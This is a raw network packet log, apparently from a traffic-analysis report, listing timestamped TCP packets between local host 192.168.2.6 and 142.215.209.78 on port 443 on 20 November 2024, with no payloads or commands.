                                                                                                        Nov 20, 2024 20:33:49.922534943 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:49.922578096 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:49.935745001 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:49.935767889 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:49.935797930 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:49.935828924 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:49.935833931 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:49.945647955 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:49.945775986 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:49.945780993 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:49.955744028 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:49.955842972 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:49.955847979 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:49.968908072 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:49.968997955 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:49.969005108 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:49.978909016 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:49.978950977 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:49.978971958 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:49.978976965 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:49.979003906 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:49.992073059 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:49.992152929 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:49.992186069 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:49.992192030 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:49.992255926 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:50.001935959 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.001956940 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.002017021 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:50.002027988 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.013726950 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.013763905 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.013784885 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:50.013792038 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.013834000 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:50.023555994 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.023566961 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.023621082 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:50.023633957 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.023904085 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:50.033579111 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.033647060 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:50.033660889 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.078572035 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:50.134574890 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.134591103 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.134673119 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:50.134692907 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.141366959 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.141375065 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.141432047 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:50.141441107 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.148983955 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.148998022 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.149055004 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:50.149063110 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.152395964 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.152404070 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.152458906 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:50.152467012 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.156086922 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.156111002 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.156141996 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:50.156148911 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.156188965 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:50.160545111 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.160603046 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:50.160609007 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.163860083 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.163925886 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:50.163932085 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.167403936 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.167457104 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:50.167473078 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.171894073 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.171950102 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:50.171962976 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.175937891 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.176012039 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:50.176028013 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.179434061 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.179502010 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:50.179517031 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.182960987 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.183026075 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:50.183037043 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.187489986 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.187567949 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:50.187582970 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.190905094 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.190968990 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:50.190980911 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.194453001 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.194519043 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:50.194531918 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.198901892 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.198966980 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:50.198975086 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.250452995 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:50.320590019 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.320606947 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.320673943 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:50.320691109 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.324517012 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.324525118 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.324583054 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:50.324590921 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.327657938 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.327666044 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.327763081 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:50.327769041 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.331034899 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.331067085 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.331087112 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:50.331091881 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.331140041 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:50.335040092 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.335052967 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.335112095 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:50.335119009 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.335182905 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:50.338284016 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.338349104 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:50.338354111 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.341464996 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.341525078 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:50.341531038 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.345534086 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.345602989 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:50.345608950 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.348822117 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.348885059 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:50.348896027 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.351986885 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.352046013 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:50.352051973 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.355532885 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.355603933 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:50.355609894 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.359700918 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.359791040 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:50.359797955 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.363217115 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.363281965 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:50.363291025 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.366137028 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.366199970 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:50.366208076 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.370182037 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.370248079 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:50.370256901 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.422322035 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:50.555979967 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.555994987 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.556045055 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:50.556058884 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.558698893 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.558717012 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.558758020 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:50.558767080 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.562952042 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.562971115 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.563029051 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:50.563040972 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.563076973 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:50.567011118 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.567024946 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.567081928 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:50.567089081 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.567125082 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:50.570019007 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.570101023 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:50.570110083 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.572598934 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.572671890 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:50.572680950 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.576478958 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.576544046 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:50.576555967 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.579658985 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.579716921 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:50.579727888 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.582886934 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.582951069 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:50.582961082 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.588119984 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.588188887 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:50.588198900 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.591310978 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.591372967 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:50.591382980 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.594420910 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.594490051 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:50.594496965 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.598083019 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.598186016 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:50.598198891 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.602077007 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.602154016 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:50.602163076 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.604959965 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.605019093 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:50.605027914 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.608640909 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.608697891 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:50.608712912 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.608741045 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:50.656687021 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:50.846635103 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.846647978 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.846709013 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:50.846720934 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.849843025 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.849869013 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.849910021 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:50.849914074 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.849935055 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:50.853136063 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.853146076 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.853197098 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:50.853203058 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.857151031 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.857223034 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:50.857228041 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.860311031 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.860373020 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:50.860378981 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.863481998 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.863539934 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:50.863545895 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.867898941 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.867976904 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:50.867985010 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.870897055 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.871020079 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:50.871051073 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.874103069 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.874175072 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:50.874186039 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.878268003 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.878334999 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:50.878341913 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.881474018 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.881544113 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:50.881551981 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.885035038 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.885098934 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:50.885107040 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.888294935 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.888359070 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:50.888372898 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.892431974 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.892537117 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:50.892545938 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.895543098 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.895613909 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:50.895622969 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.898840904 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.898940086 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:50.898947954 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:50.953571081 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:51.135071039 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.135083914 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.135164976 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:51.135181904 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.137676954 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.137686014 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.137748003 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:51.137757063 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.141813040 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.141820908 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.141896009 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:51.141906977 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.144983053 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.145023108 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.145092964 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:51.145100117 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.145144939 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:51.148117065 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.148124933 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.148195982 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:51.148206949 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.148293018 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:51.152349949 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.152477026 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:51.152488947 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.155672073 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.155735970 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:51.155747890 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.159629107 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.159703970 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:51.159714937 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.162878036 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.162957907 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:51.162969112 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.166553020 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.166630030 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:51.166641951 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.169914007 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.169981003 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:51.169991016 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.173032999 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.173182011 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:51.173194885 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.176944017 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.177011967 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:51.177022934 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.180233002 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.180296898 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:51.180311918 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.184323072 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.184415102 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:51.184428930 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.187576056 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.187657118 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:51.187666893 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.234811068 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:51.339478016 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.339493990 CET44349734142.215.209.78192.168.2.6
